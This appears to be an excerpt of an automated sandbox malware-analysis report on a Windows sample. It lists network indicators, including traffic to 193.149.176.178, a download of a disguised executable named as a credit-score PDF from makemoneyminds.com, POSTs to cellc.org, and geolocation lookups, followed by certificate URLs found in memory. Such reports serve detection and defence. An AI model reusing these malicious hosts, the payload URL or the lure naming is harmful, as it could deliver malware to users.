                        Source: unknownTCP traffic detected without corresponding DNS query: 193.149.176.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.149.176.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.149.176.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.149.176.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.149.176.178
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A0D95F InternetQueryDataAvailable,InternetReadFile,GetLastError,SetEvent,SetEvent,10_2_00A0D95F
                        Source: global trafficHTTP traffic detected: GET /1gFnW4 HTTP/1.1User-Agent: NathanHost: 2no.co
                        Source: global trafficHTTP traffic detected: GET /YourCreditScore-ReportFileNumber-73211fcf-78f6-daeb-5650-a152fc5bfdcd-431a0807-57f0-cc80-d209-2cpdf.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: makemoneyminds.com
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.1
                        Source: global trafficDNS traffic detected: DNS query: 2no.co
                        Source: global trafficDNS traffic detected: DNS query: uqxOPcjzRTNSjLPJLsvEoGgENV.uqxOPcjzRTNSjLPJLsvEoGgENV
                        Source: global trafficDNS traffic detected: DNS query: cellc.org
                        Source: global trafficDNS traffic detected: DNS query: makemoneyminds.com
                        Source: global trafficDNS traffic detected: DNS query: blank-dvgxd.in
                        Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                        Source: global trafficDNS traffic detected: DNS query: ip-api.com
                        Source: unknownHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ywleoxljcxyhv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: cellc.org
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 08 May 2024 14:41:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 83 Data Ascii: r
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 08 May 2024 14:41:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 08 May 2024 14:41:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 08 May 2024 14:41:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 6b 4d f1 35 05 f5 fd 5e fe 97 ec ae 31 da 2d da f5 6c 63 1a 99 98 ac dc 61 d0 37 01 20 9c 0d 98 5c 2b 61 51 ad 94 67 e1 5d aa 4d 04 38 63 28 1e 90 21 a4 71 4d eb 99 28 63 ce 33 c8 f3 ef 39 24 d2 4f b0 5f c7 a5 0f 40 51 3e d6 1b b7 ac 9e 57 d5 99 2e 6b 2a bc a8 a9 c8 b3 84 99 26 bb 1f 18 bc df 99 a0 06 15 30 47 f6 94 b0 00 e7 9e 2d 23 c5 7c 85 fb 4a f3 a9 42 a0 Data Ascii: #\6kM5^1-lca7 \+aQg]M8c(!qM(c39$O_@Q>W.k*&0G-#|JB
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 08 May 2024 14:41:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 08 May 2024 14:41:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 08 May 2024 14:41:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 08 May 2024 14:41:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 08 May 2024 14:41:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                        Source: DE5A.exe, 00000015.00000003.2405374161.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2468233859.000001FEA7822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
                        Source: DE5A.exe, 00000015.00000003.2408547333.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2471211597.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
                        Source: DE5A.exe, 00000015.00000003.2398538473.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405728605.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398744659.0000025F9EEE3000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397863706.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405471567.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406691220.0000025F9EEE4000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2408547333.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398642728.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398214140.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2404964950.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398437223.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397757654.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398121284.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398331494.0000025F9EEE3000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406836205.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406691220.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398331494.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405374161.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397974291.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458319429.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2471211597.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.2006529919.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                        Source: DE5A.exe, 00000015.00000003.2398538473.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405728605.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397863706.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405471567.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2408547333.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398642728.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398214140.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2404964950.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398437223.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397757654.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398121284.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406836205.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406691220.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398331494.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405374161.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397974291.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458319429.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2471211597.000001FEA7815000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458495109.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2468424463.000001FEA7815000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458790993.000001FEA7813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                        Source: DE5A.exe, 00000015.00000003.2398538473.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405728605.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397863706.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405471567.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2408547333.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398642728.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398214140.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2404964950.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398437223.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397757654.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398121284.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406836205.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406691220.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398331494.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405374161.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397974291.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458319429.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2471211597.000001FEA7815000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458495109.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2468424463.000001FEA7815000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458790993.000001FEA7813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: DE5A.exe, 00000015.00000003.2398538473.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405728605.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398744659.0000025F9EEE3000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397863706.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405471567.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406691220.0000025F9EEE4000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2408547333.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398642728.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398214140.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398989773.0000025F9EEE4000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2404964950.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398437223.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397757654.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398121284.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398331494.0000025F9EEE3000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406836205.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406691220.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398331494.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398865544.0000025F9EEE4000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405374161.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2399105753.0000025F9EEE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: DE5A.exe, 00000015.00000003.2406245957.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2469556169.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                        Source: Og1SeeXcB2.exe, 00000000.00000003.1674345470.00000000027E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                        Source: Og1SeeXcB2.exe, 00000000.00000003.1674345470.00000000027E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                        Source: Og1SeeXcB2.exe, 00000000.00000003.1674345470.00000000027E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                        Source: Og1SeeXcB2.exe, 00000000.00000003.1674345470.00000000027E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                        Source: Og1SeeXcB2.exe, 00000000.00000003.1674345470.00000000027E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
